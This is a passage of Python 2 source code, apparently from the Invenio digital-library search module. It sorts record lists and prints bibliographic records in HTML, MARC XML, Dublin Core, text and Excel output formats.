Sort records in 'recIDs' list according sort field 'sort_field' in order 'sort_order'.
If more than one instance of 'sort_field' is found for a given record, try to choose that that is given by
'sort pattern', for example "sort by report number that starts by CERN-PS".
Note that 'sort_field' can be field code like 'author' or MARC tag like '100__a' directly."""
_ = gettext_set_language(ln)
#we should return sorted records up to irec_max(exclusive)
dummy, irec_max = get_interval_for_records_to_sort(len(recIDs), jrec, rg)
#calculate the min index on the reverted list
index_min = max(len(recIDs) - irec_max, 0) #just to be sure that the min index is not negative
## check arguments:
if not sort_field:
return recIDs[index_min:]
if len(recIDs) > CFG_WEBSEARCH_NB_RECORDS_TO_SORT:
if of.startswith('h'):
write_warning(_("Sorry, sorting is allowed on sets of up to %d records only. Using default sort order.") % CFG_WEBSEARCH_NB_RECORDS_TO_SORT, "Warning", req=req)
return recIDs[index_min:]
recIDs_dict = {}
recIDs_out = []
if not tags:
# tags have not been camputed yet
sort_fields = string.split(sort_field, ",")
tags, error_field = get_tags_from_sort_fields(sort_fields)
if error_field:
if of.startswith('h'):
write_warning(_("Sorry, %s does not seem to be a valid sort option. The records will not be sorted.") % cgi.escape(error_field), "Error", req=req)
return recIDs[index_min:]
if verbose >= 3 and of.startswith('h'):
write_warning("Sorting by tags %s." % cgi.escape(repr(tags)), req=req)
if sort_pattern:
write_warning("Sorting preferentially by %s." % cgi.escape(sort_pattern), req=req)
## check if we have sorting tag defined:
if tags:
# fetch the necessary field values:
for recID in recIDs:
val = "" # will hold value for recID according to which sort
vals = [] # will hold all values found in sorting tag for recID
for tag in tags:
if CFG_CERN_SITE and tag == '773__c':
# CERN hack: journal sorting
# 773__c contains page numbers, e.g. 3-13, and we want to sort by 3, and numerically:
vals.extend(["%050s" % x.split("-", 1)[0] for x in get_fieldvalues(recID, tag)])
else:
vals.extend(get_fieldvalues(recID, tag))
if sort_pattern:
# try to pick that tag value that corresponds to sort pattern
bingo = 0
for v in vals:
if v.lower().startswith(sort_pattern.lower()): # bingo!
bingo = 1
val = v
break
if not bingo: # sort_pattern not present, so add other vals after spaces
val = sort_pattern + " " + string.join(vals)
else:
# no sort pattern defined, so join them all together
val = string.join(vals)
val = strip_accents(val.lower()) # sort values regardless of accents and case
if recIDs_dict.has_key(val):
recIDs_dict[val].append(recID)
else:
recIDs_dict[val] = [recID]
# sort them:
recIDs_dict_keys = recIDs_dict.keys()
recIDs_dict_keys.sort()
# now that keys are sorted, create output array:
for k in recIDs_dict_keys:
for s in recIDs_dict[k]:
recIDs_out.append(s)
# ascending or descending?
if sort_order == 'a':
recIDs_out.reverse()
# okay, we are done
# return only up to the maximum that we need to sort
if len(recIDs_out) != len(recIDs):
dummy, irec_max = get_interval_for_records_to_sort(len(recIDs_out), jrec, rg)
index_min = max(len(recIDs_out) - irec_max, 0) #just to be sure that the min index is not negative
return recIDs_out[index_min:]
else:
# good, no sort needed
return recIDs[index_min:]
def get_interval_for_records_to_sort(nb_found, jrec=None, rg=None):
"""calculates in which interval should the sorted records be
a value of 'rg=-9999' means to print all records: to be used with care."""
if not jrec:
jrec = 1
if not rg:
#return all
return jrec-1, nb_found
if rg == -9999: # print all records
rg = nb_found
else:
rg = abs(rg)
if jrec < 1: # sanity checks
jrec = 1
if jrec > nb_found:
jrec = max(nb_found-rg+1, 1)
# will sort records from irec_min to irec_max excluded
irec_min = jrec - 1
irec_max = irec_min + rg
if irec_min < 0:
irec_min = 0
if irec_max > nb_found:
irec_max = nb_found
return irec_min, irec_max
def print_records(req, recIDs, jrec=1, rg=CFG_WEBSEARCH_DEF_RECORDS_IN_GROUPS, format='hb', ot='', ln=CFG_SITE_LANG,
relevances=[], relevances_prologue="(", relevances_epilogue="%%)",
decompress=zlib.decompress, search_pattern='', print_records_prologue_p=True,
print_records_epilogue_p=True, verbose=0, tab='', sf='', so='d', sp='',
rm='', em=''):
"""
Prints list of records 'recIDs' formatted according to 'format' in
groups of 'rg' starting from 'jrec'.
Assumes that the input list 'recIDs' is sorted in reverse order,
so it counts records from tail to head.
A value of 'rg=-9999' means to print all records: to be used with care.
Print also list of RELEVANCES for each record (if defined), in
between RELEVANCE_PROLOGUE and RELEVANCE_EPILOGUE.
Print prologue and/or epilogue specific to 'format' if
'print_records_prologue_p' and/or print_records_epilogue_p' are
True.
'sf' is sort field and 'rm' is ranking method that are passed here
only for proper linking purposes: e.g. when a certain ranking
method or a certain sort field was selected, keep it selected in
any dynamic search links that may be printed.
"""
if em != "" and EM_REPOSITORY["body"] not in em:
return
# load the right message language
_ = gettext_set_language(ln)
# sanity checking:
if req is None:
return
# get user_info (for formatting based on user)
if isinstance(req, cStringIO.OutputType):
user_info = {}
else:
user_info = collect_user_info(req)
if len(recIDs):
nb_found = len(recIDs)
if rg == -9999: # print all records
rg = nb_found
else:
rg = abs(rg)
if jrec < 1: # sanity checks
jrec = 1
if jrec > nb_found:
jrec = max(nb_found-rg+1, 1)
# will print records from irec_max to irec_min excluded:
irec_max = nb_found - jrec
irec_min = nb_found - jrec - rg
if irec_min < 0:
irec_min = -1
if irec_max >= nb_found:
irec_max = nb_found - 1
#req.write("%s:%d-%d" % (recIDs, irec_min, irec_max))
if format.startswith('x'):
# print header if needed
if print_records_prologue_p:
print_records_prologue(req, format)
# print records
recIDs_to_print = [recIDs[x] for x in range(irec_max, irec_min, -1)]
if ot:
# asked to print some filtered fields only, so call print_record() on the fly:
for irec in range(irec_max, irec_min, -1):
x = print_record(recIDs[irec], format, ot, ln, search_pattern=search_pattern,
user_info=user_info, verbose=verbose, sf=sf, so=so, sp=sp, rm=rm)
req.write(x)
if x:
req.write('\n')
else:
format_records(recIDs_to_print,
format,
ln=ln,
search_pattern=search_pattern,
record_separator="\n",
user_info=user_info,
req=req)
# print footer if needed
if print_records_epilogue_p:
print_records_epilogue(req, format)
elif format.startswith('t') or str(format[0:3]).isdigit():
# we are doing plain text output:
for irec in range(irec_max, irec_min, -1):
x = print_record(recIDs[irec], format, ot, ln, search_pattern=search_pattern,
user_info=user_info, verbose=verbose, sf=sf, so=so, sp=sp, rm=rm)
req.write(x)
if x:
req.write('\n')
elif format == 'excel':
recIDs_to_print = [recIDs[x] for x in range(irec_max, irec_min, -1)]
create_excel(recIDs=recIDs_to_print, req=req, ln=ln, ot=ot, user_info=user_info)
else:
# we are doing HTML output:
if format == 'hp' or format.startswith("hb_") or format.startswith("hd_"):
# portfolio and on-the-fly formats:
for irec in range(irec_max, irec_min, -1):
req.write(print_record(recIDs[irec], format, ot, ln, search_pattern=search_pattern,
user_info=user_info, verbose=verbose, sf=sf, so=so, sp=sp, rm=rm))
elif format.startswith("hb"):
# HTML brief format:
display_add_to_basket = True
if user_info:
if user_info['email'] == 'guest':
if CFG_ACCESS_CONTROL_LEVEL_ACCOUNTS > 4:
display_add_to_basket = False
else:
if not user_info['precached_usebaskets']:
display_add_to_basket = False
if em != "" and EM_REPOSITORY["basket"] not in em:
display_add_to_basket = False
req.write(websearch_templates.tmpl_record_format_htmlbrief_header(
ln = ln))
for irec in range(irec_max, irec_min, -1):
row_number = jrec+irec_max-irec
recid = recIDs[irec]
if relevances and relevances[irec]:
relevance = relevances[irec]
else:
relevance = ''
record = print_record(recIDs[irec], format, ot, ln, search_pattern=search_pattern,
user_info=user_info, verbose=verbose, sf=sf, so=so, sp=sp, rm=rm)
req.write(websearch_templates.tmpl_record_format_htmlbrief_body(
ln = ln,
recid = recid,
row_number = row_number,
relevance = relevance,
record = record,
relevances_prologue = relevances_prologue,
relevances_epilogue = relevances_epilogue,
display_add_to_basket = display_add_to_basket
))
req.write(websearch_templates.tmpl_record_format_htmlbrief_footer(
ln = ln,
display_add_to_basket = display_add_to_basket))
elif format.startswith("hd"):
# HTML detailed format:
for irec in range(irec_max, irec_min, -1):
if record_exists(recIDs[irec]) == -1:
write_warning(_("The record has been deleted."), req=req)
merged_recid = get_merged_recid(recIDs[irec])
if merged_recid:
write_warning(_("The record %d replaces it." % merged_recid), req=req)
continue
unordered_tabs = get_detailed_page_tabs(get_colID(guess_primary_collection_of_a_record(recIDs[irec])),
recIDs[irec], ln=ln)
ordered_tabs_id = [(tab_id, values['order']) for (tab_id, values) in unordered_tabs.iteritems()]
ordered_tabs_id.sort(lambda x, y: cmp(x[1], y[1]))
link_ln = ''
if ln != CFG_SITE_LANG:
link_ln = '?ln=%s' % ln
recid = recIDs[irec]
recid_to_display = recid # Record ID used to build the URL.
if CFG_WEBSEARCH_USE_ALEPH_SYSNOS:
try:
recid_to_display = get_fieldvalues(recid,
CFG_BIBUPLOAD_EXTERNAL_SYSNO_TAG)[0]
except IndexError:
# No external sysno is available, keep using
# internal recid.
pass
tabs = [(unordered_tabs[tab_id]['label'], \
'%s/%s/%s/%s%s' % (CFG_SITE_URL, CFG_SITE_RECORD, recid_to_display, tab_id, link_ln), \
tab_id == tab,
unordered_tabs[tab_id]['enabled']) \
for (tab_id, order) in ordered_tabs_id
if unordered_tabs[tab_id]['visible'] == True]
tabs_counts = get_detailed_page_tabs_counts(recid)
citedbynum = tabs_counts['Citations']
references = tabs_counts['References']
discussions = tabs_counts['Discussions']
# load content
if tab == 'usage':
req.write(webstyle_templates.detailed_record_container_top(recIDs[irec],
tabs,
ln,
citationnum=citedbynum,
referencenum=references,
discussionnum=discussions))
r = calculate_reading_similarity_list(recIDs[irec], "downloads")
downloadsimilarity = None
downloadhistory = None
#if r:
# downloadsimilarity = r
if CFG_BIBRANK_SHOW_DOWNLOAD_GRAPHS:
downloadhistory = create_download_history_graph_and_box(recIDs[irec], ln)
r = calculate_reading_similarity_list(recIDs[irec], "pageviews")
viewsimilarity = None
if r: viewsimilarity = r
content = websearch_templates.tmpl_detailed_record_statistics(recIDs[irec],
ln,
downloadsimilarity=downloadsimilarity,
downloadhistory=downloadhistory,
viewsimilarity=viewsimilarity)
req.write(content)
req.write(webstyle_templates.detailed_record_container_bottom(recIDs[irec],
tabs,
ln))
elif tab == 'citations':
recid = recIDs[irec]
req.write(webstyle_templates.detailed_record_container_top(recid,
tabs,
ln,
citationnum=citedbynum,
referencenum=references,
discussionnum=discussions))
req.write(websearch_templates.tmpl_detailed_record_citations_prologue(recid, ln))
# Citing
citinglist = calculate_cited_by_list(recid)
req.write(websearch_templates.tmpl_detailed_record_citations_citing_list(recid,
ln,
citinglist,
sf=sf,
so=so,
sp=sp,
rm=rm))
# Self-cited
selfcited = get_self_cited_by(recid)
req.write(websearch_templates.tmpl_detailed_record_citations_self_cited(recid,
ln, selfcited=selfcited, citinglist=citinglist))
# Co-cited
s = calculate_co_cited_with_list(recid)
cociting = None
if s:
cociting = s
req.write(websearch_templates.tmpl_detailed_record_citations_co_citing(recid,
ln,
cociting=cociting))
# Citation history, if needed
citationhistory = None
if citinglist:
citationhistory = create_citation_history_graph_and_box(recid, ln)
#debug
if verbose > 3:
write_warning("Citation graph debug: " + \
str(len(citationhistory)), req=req)
req.write(websearch_templates.tmpl_detailed_record_citations_citation_history(recid, ln, citationhistory))
req.write(websearch_templates.tmpl_detailed_record_citations_epilogue(recid, ln))
req.write(webstyle_templates.detailed_record_container_bottom(recid,
tabs,
ln))
elif tab == 'references':
req.write(webstyle_templates.detailed_record_container_top(recIDs[irec],
tabs,
ln,
citationnum=citedbynum,
referencenum=references,
discussionnum=discussions))
req.write(format_record(recIDs[irec], 'HDREF', ln=ln, user_info=user_info, verbose=verbose))
req.write(webstyle_templates.detailed_record_container_bottom(recIDs[irec],
tabs,
ln))
elif tab == 'keywords':
from invenio.bibclassify_webinterface import \
record_get_keywords, write_keywords_body, \
generate_keywords
from invenio.webinterface_handler import wash_urlargd
form = req.form
argd = wash_urlargd(form, {
'generate': (str, 'no'),
'sort': (str, 'occurrences'),
'type': (str, 'tagcloud'),
'numbering': (str, 'off'),
})
recid = recIDs[irec]
req.write(webstyle_templates.detailed_record_container_top(recid,
tabs,
ln))
content = websearch_templates.tmpl_record_plots(recID=recid,
ln=ln)
req.write(content)
req.write(webstyle_templates.detailed_record_container_bottom(recid,
tabs,
ln))
req.write(webstyle_templates.detailed_record_container_top(recid,
tabs, ln, citationnum=citedbynum, referencenum=references))
if argd['generate'] == 'yes':
# The user asked to generate the keywords.
keywords = generate_keywords(req, recid, argd)
else:
# Get the keywords contained in the MARC.
keywords = record_get_keywords(recid, argd)
if argd['sort'] == 'related' and not keywords:
req.write('You may want to run BibIndex.')
# Output the keywords or the generate button.
write_keywords_body(keywords, req, recid, argd)
req.write(webstyle_templates.detailed_record_container_bottom(recid,
tabs, ln))
elif tab == 'plots':
req.write(webstyle_templates.detailed_record_container_top(recIDs[irec],
tabs,
ln))
content = websearch_templates.tmpl_record_plots(recID=recIDs[irec],
ln=ln)
req.write(content)
req.write(webstyle_templates.detailed_record_container_bottom(recIDs[irec],
tabs,
ln))
else:
# Metadata tab
req.write(webstyle_templates.detailed_record_container_top(recIDs[irec],
tabs,
ln,
show_short_rec_p=False,
citationnum=citedbynum, referencenum=references,
discussionnum=discussions))
creationdate = None
modificationdate = None
if record_exists(recIDs[irec]) == 1:
creationdate = get_creation_date(recIDs[irec])
modificationdate = get_modification_date(recIDs[irec])
content = print_record(recIDs[irec], format, ot, ln,
search_pattern=search_pattern,
user_info=user_info, verbose=verbose,
sf=sf, so=so, sp=sp, rm=rm)
content = websearch_templates.tmpl_detailed_record_metadata(
recID = recIDs[irec],
ln = ln,
format = format,
creationdate = creationdate,
modificationdate = modificationdate,
content = content)
# display of the next-hit/previous-hit/back-to-search links
# on the detailed record pages
content += websearch_templates.tmpl_display_back_to_search(req,
recIDs[irec],
ln)
req.write(content)
req.write(webstyle_templates.detailed_record_container_bottom(recIDs[irec],
tabs,
ln,
creationdate=creationdate,
modificationdate=modificationdate,
show_short_rec_p=False))
if len(tabs) > 0:
# Add the mini box at bottom of the page
if CFG_WEBCOMMENT_ALLOW_REVIEWS:
from invenio.webcomment import get_mini_reviews
reviews = get_mini_reviews(recid = recIDs[irec], ln=ln)
else:
reviews = ''
actions = format_record(recIDs[irec], 'HDACT', ln=ln, user_info=user_info, verbose=verbose)
files = format_record(recIDs[irec], 'HDFILE', ln=ln, user_info=user_info, verbose=verbose)
req.write(webstyle_templates.detailed_record_mini_panel(recIDs[irec],
ln,
format,
files=files,
reviews=reviews,
actions=actions))
else:
# Other formats
for irec in range(irec_max, irec_min, -1):
req.write(print_record(recIDs[irec], format, ot, ln,
search_pattern=search_pattern,
user_info=user_info, verbose=verbose,
sf=sf, so=so, sp=sp, rm=rm))
else:
write_warning(_("Use different search terms."), req=req)
def print_records_prologue(req, format, cc=None):
"""
Print the appropriate prologue for list of records in the given
format.
"""
prologue = "" # no prologue needed for HTML or Text formats
if format.startswith('xm'):
prologue = websearch_templates.tmpl_xml_marc_prologue()
elif format.startswith('xn'):
prologue = websearch_templates.tmpl_xml_nlm_prologue()
elif format.startswith('xw'):
prologue = websearch_templates.tmpl_xml_refworks_prologue()
elif format.startswith('xr'):
prologue = websearch_templates.tmpl_xml_rss_prologue(cc=cc)
elif format.startswith('xe8x'):
prologue = websearch_templates.tmpl_xml_endnote_8x_prologue()
elif format.startswith('xe'):
prologue = websearch_templates.tmpl_xml_endnote_prologue()
elif format.startswith('xo'):
prologue = websearch_templates.tmpl_xml_mods_prologue()
elif format.startswith('xp'):
prologue = websearch_templates.tmpl_xml_podcast_prologue(cc=cc)
elif format.startswith('x'):
prologue = websearch_templates.tmpl_xml_default_prologue()
req.write(prologue)
def print_records_epilogue(req, format):
"""
Print the appropriate epilogue for list of records in the given
format.
"""
epilogue = "" # no epilogue needed for HTML or Text formats
if format.startswith('xm'):
epilogue = websearch_templates.tmpl_xml_marc_epilogue()
elif format.startswith('xn'):
epilogue = websearch_templates.tmpl_xml_nlm_epilogue()
elif format.startswith('xw'):
epilogue = websearch_templates.tmpl_xml_refworks_epilogue()
elif format.startswith('xr'):
epilogue = websearch_templates.tmpl_xml_rss_epilogue()
elif format.startswith('xe8x'):
epilogue = websearch_templates.tmpl_xml_endnote_8x_epilogue()
elif format.startswith('xe'):
epilogue = websearch_templates.tmpl_xml_endnote_epilogue()
elif format.startswith('xo'):
epilogue = websearch_templates.tmpl_xml_mods_epilogue()
elif format.startswith('xp'):
epilogue = websearch_templates.tmpl_xml_podcast_epilogue()
elif format.startswith('x'):
epilogue = websearch_templates.tmpl_xml_default_epilogue()
req.write(epilogue)
def get_record(recid):
"""Directly the record object corresponding to the recid."""
if CFG_BIBUPLOAD_SERIALIZE_RECORD_STRUCTURE:
value = run_sql("SELECT value FROM bibfmt WHERE id_bibrec=%s AND FORMAT='recstruct'", (recid, ))
if value:
try:
return deserialize_via_marshal(value[0][0])
except:
### In case of corruption, let's rebuild it!
pass
return create_record(print_record(recid, 'xm'))[0]
def print_record(recID, format='hb', ot='', ln=CFG_SITE_LANG, decompress=zlib.decompress,
search_pattern=None, user_info=None, verbose=0, sf='', so='d',
sp='', rm='', brief_links=True):
"""
Prints record 'recID' formatted according to 'format'.
'sf' is sort field and 'rm' is ranking method that are passed here
only for proper linking purposes: e.g. when a certain ranking
method or a certain sort field was selected, keep it selected in
any dynamic search links that may be printed.
"""
if format == 'recstruct':
return get_record(recID)
_ = gettext_set_language(ln)
display_claim_this_paper = False
try:
display_claim_this_paper = user_info["precached_viewclaimlink"]
except (KeyError, TypeError):
display_claim_this_paper = False
#check from user information if the user has the right to see hidden fields/tags in the
#records as well
can_see_hidden = False
if user_info:
can_see_hidden = user_info.get('precached_canseehiddenmarctags', False)
out = ""
# sanity check:
record_exist_p = record_exists(recID)
if record_exist_p == 0: # doesn't exist
return out
# New Python BibFormat procedure for formatting
# Old procedure follows further below
# We must still check some special formats, but these
# should disappear when BibFormat improves.
if not (CFG_BIBFORMAT_USE_OLD_BIBFORMAT \
or format.lower().startswith('t') \
or format.lower().startswith('hm') \
or str(format[0:3]).isdigit() \
or ot):
# Unspecified format is hd
if format == '':
format = 'hd'
if record_exist_p == -1 and get_output_format_content_type(format) == 'text/html':
# HTML output displays a default value for deleted records.
# Other format have to deal with it.
out += _("The record has been deleted.")
# was record deleted-but-merged ?
merged_recid = get_merged_recid(recID)
if merged_recid:
out += ' ' + _("The record %d replaces it." % merged_recid)
else:
out += call_bibformat(recID, format, ln, search_pattern=search_pattern,
user_info=user_info, verbose=verbose)
# at the end of HTML brief mode, print the "Detailed record" functionality:
if brief_links and format.lower().startswith('hb') and \
format.lower() != 'hb_p':
out += websearch_templates.tmpl_print_record_brief_links(ln=ln,
recID=recID,
sf=sf,
so=so,
sp=sp,
rm=rm,
display_claim_link=display_claim_this_paper)
return out
# Old PHP BibFormat procedure for formatting
# print record opening tags, if needed:
if format == "marcxml" or format == "oai_dc":
out += " <record>\n"
out += " <header>\n"
for oai_id in get_fieldvalues(recID, CFG_OAI_ID_FIELD):
out += " <identifier>%s</identifier>\n" % oai_id
out += " <datestamp>%s</datestamp>\n" % get_modification_date(recID)
out += " </header>\n"
out += " <metadata>\n"
if format.startswith("xm") or format == "marcxml":
# look for detailed format existence:
query = "SELECT value FROM bibfmt WHERE id_bibrec=%s AND format=%s"
res = run_sql(query, (recID, format), 1)
if res and record_exist_p == 1 and not ot:
# record 'recID' is formatted in 'format', and we are not
# asking for field-filtered output; so print it:
out += "%s" % decompress(res[0][0])
elif ot:
# field-filtered output was asked for; print only some fields
if not can_see_hidden:
ot = list(set(ot) - set(CFG_BIBFORMAT_HIDDEN_TAGS))
out += record_xml_output(get_record(recID), ot)
else:
# record 'recID' is not formatted in 'format' or we ask
# for field-filtered output -- they are not in "bibfmt"
# table; so fetch all the data from "bibXXx" tables:
if format == "marcxml":
out += """ <record xmlns="http://www.loc.gov/MARC21/slim">\n"""
out += " <controlfield tag=\"001\">%d</controlfield>\n" % int(recID)
elif format.startswith("xm"):
out += """ <record>\n"""
out += " <controlfield tag=\"001\">%d</controlfield>\n" % int(recID)
if record_exist_p == -1:
# deleted record, so display only OAI ID and 980:
oai_ids = get_fieldvalues(recID, CFG_OAI_ID_FIELD)
if oai_ids:
out += "<datafield tag=\"%s\" ind1=\"%s\" ind2=\"%s\"><subfield code=\"%s\">%s</subfield></datafield>\n" % \
(CFG_OAI_ID_FIELD[0:3], CFG_OAI_ID_FIELD[3:4], CFG_OAI_ID_FIELD[4:5], CFG_OAI_ID_FIELD[5:6], oai_ids[0])
out += "<datafield tag=\"980\" ind1=\"\" ind2=\"\"><subfield code=\"c\">DELETED</subfield></datafield>\n"
else:
# controlfields
query = "SELECT b.tag,b.value,bb.field_number FROM bib00x AS b, bibrec_bib00x AS bb "\
"WHERE bb.id_bibrec=%s AND b.id=bb.id_bibxxx AND b.tag LIKE '00%%' "\
"ORDER BY bb.field_number, b.tag ASC"
res = run_sql(query, (recID, ))
for row in res:
field, value = row[0], row[1]
value = encode_for_xml(value)
out += """ <controlfield tag="%s">%s</controlfield>\n""" % \
(encode_for_xml(field[0:3]), value)
# datafields
i = 1 # Do not process bib00x and bibrec_bib00x, as
# they are controlfields. So start at bib01x and
# bibrec_bib00x (and set i = 0 at the end of
# first loop)
for digit1 in range(0, 10):
for digit2 in range(i, 10):
bx = "bib%d%dx" % (digit1, digit2)
bibx = "bibrec_bib%d%dx" % (digit1, digit2)
query = "SELECT b.tag,b.value,bb.field_number FROM %s AS b, %s AS bb "\
"WHERE bb.id_bibrec=%%s AND b.id=bb.id_bibxxx AND b.tag LIKE %%s"\
"ORDER BY bb.field_number, b.tag ASC" % (bx, bibx)
res = run_sql(query, (recID, str(digit1)+str(digit2)+'%'))
field_number_old = -999
field_old = ""
for row in res:
field, value, field_number = row[0], row[1], row[2]
ind1, ind2 = field[3], field[4]
if ind1 == "_" or ind1 == "":
ind1 = " "
if ind2 == "_" or ind2 == "":
ind2 = " "
# print field tag, unless hidden
printme = True
if not can_see_hidden:
for htag in CFG_BIBFORMAT_HIDDEN_TAGS:
ltag = len(htag)
samelenfield = field[0:ltag]
if samelenfield == htag:
printme = False
if printme:
if field_number != field_number_old or field[:-1] != field_old[:-1]:
if field_number_old != -999:
out += """ </datafield>\n"""
out += """ <datafield tag="%s" ind1="%s" ind2="%s">\n""" % \
(encode_for_xml(field[0:3]), encode_for_xml(ind1), encode_for_xml(ind2))
field_number_old = field_number
field_old = field
# print subfield value
value = encode_for_xml(value)
out += """ <subfield code="%s">%s</subfield>\n""" % \
(encode_for_xml(field[-1:]), value)
# all fields/subfields printed in this run, so close the tag:
if field_number_old != -999:
out += """ </datafield>\n"""
i = 0 # Next loop should start looking at bib%0 and bibrec_bib00x
# we are at the end of printing the record:
out += " </record>\n"
elif format == "xd" or format == "oai_dc":
# XML Dublin Core format, possibly OAI -- select only some bibXXx fields:
out += """ <dc xmlns="http://purl.org/dc/elements/1.1/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://purl.org/dc/elements/1.1/
http://www.openarchives.org/OAI/1.1/dc.xsd">\n"""
if record_exist_p == -1:
out += ""
else:
for f in get_fieldvalues(recID, "041__a"):
out += " <language>%s</language>\n" % f
for f in get_fieldvalues(recID, "100__a"):
out += " <creator>%s</creator>\n" % encode_for_xml(f)
for f in get_fieldvalues(recID, "700__a"):
out += " <creator>%s</creator>\n" % encode_for_xml(f)
for f in get_fieldvalues(recID, "245__a"):
out += " <title>%s</title>\n" % encode_for_xml(f)
for f in get_fieldvalues(recID, "65017a"):
out += " <subject>%s</subject>\n" % encode_for_xml(f)
for f in get_fieldvalues(recID, "8564_u"):
if f.split('.') == 'png':
continue
out += " <identifier>%s</identifier>\n" % encode_for_xml(f)
for f in get_fieldvalues(recID, "520__a"):
out += " <description>%s</description>\n" % encode_for_xml(f)
out += " <date>%s</date>\n" % get_creation_date(recID)
out += " </dc>\n"
elif len(format) == 6 and str(format[0:3]).isdigit():
# user has asked to print some fields only
if format == "001":
out += "<!--%s-begin-->%s<!--%s-end-->\n" % (format, recID, format)
else:
vals = get_fieldvalues(recID, format)
for val in vals:
out += "<!--%s-begin-->%s<!--%s-end-->\n" % (format, val, format)
elif format.startswith('t'):
## user directly asked for some tags to be displayed only
if record_exist_p == -1:
out += get_fieldvalues_alephseq_like(recID, ["001", CFG_OAI_ID_FIELD, "980"], can_see_hidden)
else:
out += get_fieldvalues_alephseq_like(recID, ot, can_see_hidden)
elif format == "hm":
if record_exist_p == -1:
out += "\n<pre>" + cgi.escape(get_fieldvalues_alephseq_like(recID, ["001", CFG_OAI_ID_FIELD, "980"], can_see_hidden)) + "</pre>"
else:
out += "\n<pre>" + cgi.escape(get_fieldvalues_alephseq_like(recID, ot, can_see_hidden)) + "</pre>"
elif format.startswith("h") and ot:
## user directly asked for some tags to be displayed only
if record_exist_p == -1:
out += "\n<pre>" + get_fieldvalues_alephseq_like(recID, ["001", CFG_OAI_ID_FIELD, "980"], can_see_hidden) + "</pre>"
else:
out += "\n<pre>" + get_fieldvalues_alephseq_like(recID, ot, can_see_hidden) + "</pre>"
elif format == "hd":
# HTML detailed format
if record_exist_p == -1:
out += _("The record has been deleted.")
else:
# look for detailed format existence:
query = "SELECT value FROM bibfmt WHERE id_bibrec=%s AND format=%s"
res = run_sql(query, (recID, format), 1)
if res:
# record 'recID' is formatted in 'format', so print it
out += "%s" % decompress(res[0][0])
else:
# record 'recID' is not formatted in 'format', so try to call BibFormat on the fly or use default format:
out_record_in_format = call_bibformat(recID, format, ln, search_pattern=search_pattern,
user_info=user_info, verbose=verbose)
if out_record_in_format:
out += out_record_in_format
else:
out += websearch_templates.tmpl_print_record_detailed(
ln = ln,
recID = recID,
)
elif format.startswith("hb_") or format.startswith("hd_"):
# underscore means that HTML brief/detailed formats should be called on-the-fly; suitable for testing formats
if record_exist_p == -1:
out += _("The record has been deleted.")
else:
out += call_bibformat(recID, format, ln, search_pattern=search_pattern,
user_info=user_info, verbose=verbose)
elif format.startswith("hx"):
# BibTeX format, called on the fly:
if record_exist_p == -1:
out += _("The record has been deleted.")
else:
out += call_bibformat(recID, format, ln, search_pattern=search_pattern,
user_info=user_info, verbose=verbose)
elif format.startswith("hs"):
# for citation/download similarity navigation links:
if record_exist_p == -1:
out += _("The record has been deleted.")
else:
out += '<a href="%s">' % websearch_templates.build_search_url(recid=recID, ln=ln)
# firstly, title:
titles = get_fieldvalues(recID, "245__a")
if titles:
for title in titles:
out += "<strong>%s</strong>" % title
else:
# usual title not found, try conference title:
titles = get_fieldvalues(recID, "111__a")
if titles:
for title in titles:
out += "<strong>%s</strong>" % title
else:
# just print record ID:
out += "<strong>%s %d</strong>" % (get_field_i18nname("record ID", ln, False), recID)
out += "</a>"
# secondly, authors:
authors = get_fieldvalues(recID, "100__a") + get_fieldvalues(recID, "700__a")
if authors:
out += " - %s" % authors[0]
if len(authors) > 1:
out += " <em>et al</em>"
# thirdly publication info:
publinfos = get_fieldvalues(recID, "773__s")
if not publinfos:
publinfos = get_fieldvalues(recID, "909C4s")
if not publinfos:
publinfos = get_fieldvalues(recID, "037__a")
if not publinfos:
publinfos = get_fieldvalues(recID, "088__a")
if publinfos:
out += " - %s" % publinfos[0]
else:
# fourthly publication year (if not publication info):
years = get_fieldvalues(recID, "773__y")
if not years:
years = get_fieldvalues(recID, "909C4y")
if not years:
years = get_fieldvalues(recID, "260__c")
if years:
out += " (%s)" % years[0]
else:
# HTML brief format by default
if record_exist_p == -1:
out += _("The record has been deleted.")
else:
query = "SELECT value FROM bibfmt WHERE id_bibrec=%s AND format=%s"
res = run_sql(query, (recID, format))
if res:
# record 'recID' is formatted in 'format', so print it
out += "%s" % decompress(res[0][0])
else:
# record 'recID' is not formatted in 'format', so try to call BibFormat on the fly: or use default format:
if CFG_WEBSEARCH_CALL_BIBFORMAT:
out_record_in_format = call_bibformat(recID, format, ln, search_pattern=search_pattern,
user_info=user_info, verbose=verbose)
if out_record_in_format:
out += out_record_in_format
else:
out += websearch_templates.tmpl_print_record_brief(
ln = ln,
recID = recID,
)
else:
out += websearch_templates.tmpl_print_record_brief(
ln = ln,
recID = recID,
)
# at the end of HTML brief mode, print the "Detailed record" functionality:
if format == 'hp' or format.startswith("hb_") or format.startswith("hd_"):
pass # do nothing for portfolio and on-the-fly formats
else:
out += websearch_templates.tmpl_print_record_brief_links(ln=ln,
recID=recID,
sf=sf,
so=so,
sp=sp,
rm=rm,
display_claim_link=display_claim_this_paper)
# print record closing tags, if needed:
if format == "marcxml" or format == "oai_dc":
out += " </metadata>\n"
out += " </record>\n"
return out
def call_bibformat(recID, format="HD", ln=CFG_SITE_LANG, search_pattern=None, user_info=None, verbose=0):
"""
Calls BibFormat and returns formatted record.
BibFormat will decide by itself if old or new BibFormat must be used.
"""
from invenio.bibformat_utils import get_pdf_snippets
keywords = []
if search_pattern is not None:
for unit in create_basic_search_units(None, str(search_pattern), None):
bsu_o, bsu_p, bsu_f, bsu_m = unit[0], unit[1], unit[2], unit[3]
if (bsu_o != '-' and bsu_f in [None, 'fulltext']):
if bsu_m == 'a' and bsu_p.startswith('%') and bsu_p.endswith('%'):
# remove leading and training `%' representing partial phrase search
keywords.append(bsu_p[1:-1])
else:
keywords.append(bsu_p)
out = format_record(recID,
of=format,
ln=ln,
search_pattern=keywords,
user_info=user_info,
verbose=verbose)
if CFG_WEBSEARCH_FULLTEXT_SNIPPETS and user_info and \
'fulltext' in user_info['uri'].lower():
# check snippets only if URL contains fulltext
# FIXME: make it work for CLI too, via new function arg
if keywords:
snippets = ''
try:
snippets = get_pdf_snippets(recID, keywords, user_info)
except:
register_exception()
if snippets:
out += snippets
return out
def log_query(hostname, query_args, uid=-1):
"""
Log query into the query and user_query tables.
Return id_query or None in case of problems.
"""
id_query = None
if uid >= 0:
# log the query only if uid is reasonable
res = run_sql("SELECT id FROM query WHERE urlargs=%s", (query_args,), 1)
try:
id_query = res[0][0]
except:
